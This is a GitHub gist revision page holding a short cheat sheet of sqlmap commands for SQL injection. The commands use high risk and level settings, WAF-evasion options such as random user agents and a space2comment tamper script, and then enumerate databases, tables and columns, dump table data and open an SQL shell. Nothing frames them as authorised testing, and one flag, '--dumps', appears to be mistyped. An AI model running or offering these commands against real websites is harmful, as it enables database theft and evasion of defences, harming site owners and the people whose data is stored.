Last active
          March 10, 2019 10:20 
        
      - 
      
- 
        Save mstfydmr/162b339bfb14749b2386c197d0f917b7 to your computer and use it in GitHub Desktop. 
Revisions
- 
        mstfydmr revised this gist Mar 10, 2019 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewingThis file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -10,4 +10,5 @@ sqlmap.py -u URL --dbs sqlmap.py -u URL -D DATABASE --tables sqlmap.py -u URL -D DATABASE -T TABLE --columns sqlmap.py -u URL -D DATABASE -T TABLE --dumps sqlmap.py -u URL --sql-shell ``` 
- 
        mstfydmr revised this gist Mar 10, 2019 . 1 changed file with 5 additions and 3 deletions.There are no files selected for viewingThis file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,11 +1,13 @@ # Windows ```C:\Python27\python.exe sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL``` # Linux ```./sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL``` # Usage ``` sqlmap.py -u URL --dbs sqlmap.py -u URL -D DATABASE --tables sqlmap.py -u URL -D DATABASE -T TABLE --columns sqlmap.py -u URL -D DATABASE -T TABLE --dumps ``` 
- 
        mstfydmr created this gist Mar 10, 2019 .There are no files selected for viewingThis file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,11 @@ # Windows C:\Python27\python.exe sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL # Linux ./sqlmap.py -v 3 --risk=3 --level=3 --identify-waf --random-agent --tamper=space2comment -u URL # Usage sqlmap.py -u URL --dbs sqlmap.py -u URL -D DATABASE --tables sqlmap.py -u URL -D DATABASE -T TABLE --columns sqlmap.py -u URL -D DATABASE -T TABLE --dumps